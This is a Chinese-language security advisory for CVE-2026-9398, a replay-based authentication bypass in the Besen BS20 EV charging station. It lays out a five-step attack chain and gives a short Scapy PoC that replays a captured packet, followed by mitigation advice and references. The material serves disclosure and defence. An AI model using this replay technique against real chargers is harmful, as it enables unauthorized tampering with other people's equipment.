CVE-2026-9398：Besen BS20充电桩认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-9398

漏洞类型

认证绕过

CVSS评分

3.1 低危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Besen BS20 EV Charging Station

漏洞概述

Besen BS20电动汽车充电站在20260426及之前的版本中存在安全漏洞。该漏洞影响设备的BLE/WiFi组件。由于缺乏适当的防重放机制，攻击者可以通过捕获并重放网络数据包来绕过身份验证。尽管攻击需要位于本地网络且利用难度较高，但成功利用可能导致未经授权篡改充电器命令，影响设备完整性。厂商已知晓此问题并正在审查。

技术细节

该漏洞的根源在于Besen BS20充电站BLE/WiFi通信组件在设计上未充分防止重放攻击。攻击者首先需要接入设备的本地网络（邻接网络），通过嗅探技术捕获设备与控制端之间传输的无线数据包。由于通信协议缺乏有效的随机数、时间戳或序列号校验机制，攻击者可以解析并提取出包含认证状态或操作指令的数据包。随后，攻击者构造并发送这些被捕获的数据包，设备端无法区分新旧请求，从而错误地验证通过或执行命令。这导致攻击者无需凭据即可绕过认证，篡改充电器设置。尽管攻击复杂度较高，但在物理邻近的环境下仍具有可行性。

攻击链分析

STEP 1

1. 网络侦测

攻击者接入Besen BS20充电桩所在的本地网络（邻接网络），通过扫描识别目标设备的BLE或WiFi接口。

STEP 2

2. 流量捕获

使用嗅探工具（如Wireshark或tcpdump）捕获设备与控制服务器或App之间的无线通信数据包。

STEP 3

3. 数据包分析

分析捕获的数据流，定位包含认证令牌或控制指令（如启动充电、修改参数）的关键数据包。

STEP 4

4. 重放攻击

使用数据包注入工具（如Scapy）将捕获的关键数据包重新发送给目标设备。由于缺乏防重放机制，设备接受该指令。

STEP 5

5. 非授权操作

设备执行攻击者发出的命令，导致充电器参数被篡改或未授权操作被执行，完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import time
import scapy.all as scapy

# Conceptual Proof of Concept for Replay Attack against CVE-2026-9398
# This script demonstrates how a captured packet could be re-injected.
# Target: Besen BS20 EV Charging Station (BLE/WiFi Component)

def replay_attack(interface, packet_file):
    """
    Reads a packet from a file and replays it on the specified interface.
    """
    try:
        # Load the captured packet (e.g., authentication or command packet)
        packets = scapy.rdpcap(packet_file)
        if not packets:
            print("[-] No packets found in file.")
            return

        target_packet = packets[0] # Assume the first packet is the exploit payload
        
        print(f"[*] Loading packet from {packet_file}")
        print(f"[*] Target Interface: {interface}")
        print("[*] Waiting for vulnerable window...")
        
        time.sleep(2)
        
        # Replay the packet
        print("[*] Sending replay packet...")
        scapy.sendp(target_packet, iface=interface, verbose=0, count=1)
        
        print("[+] Exploit packet sent successfully.")
        print("[+] Check if the device command was executed without authentication.")
        
    except Exception as e:
        print(f"[-] An error occurred: {e}")

# Example Usage:
# replay_attack('wlan0', 'besen_auth_capture.pcap')

影响范围

Besen BS20 EV Charging Station <= 20260426

防御指南

临时缓解措施

在厂商发布修复补丁前，建议将充电桩设备部署在隔离的VLAN或专用网络中，严格限制物理邻近设备的无线接入。加强网络流量监控，重点检测异常的重复数据包模式。如果业务允许，暂时关闭蓝牙功能，仅通过受信任的有线网络进行管理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9398
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9398
3 Details https://www.cvedetails.com/cve/CVE-2026-9398/
4 VulDB https://vuldb.com/cve/CVE-2026-9398
5 Link https://github.com/carfeii/besen#finding-5-unauthorized-tampering-of-charger-commands
6 Link https://vuldb.com/submit/813577
7 Link https://vuldb.com/vuln/365379
8 Link https://vuldb.com/vuln/365379/cti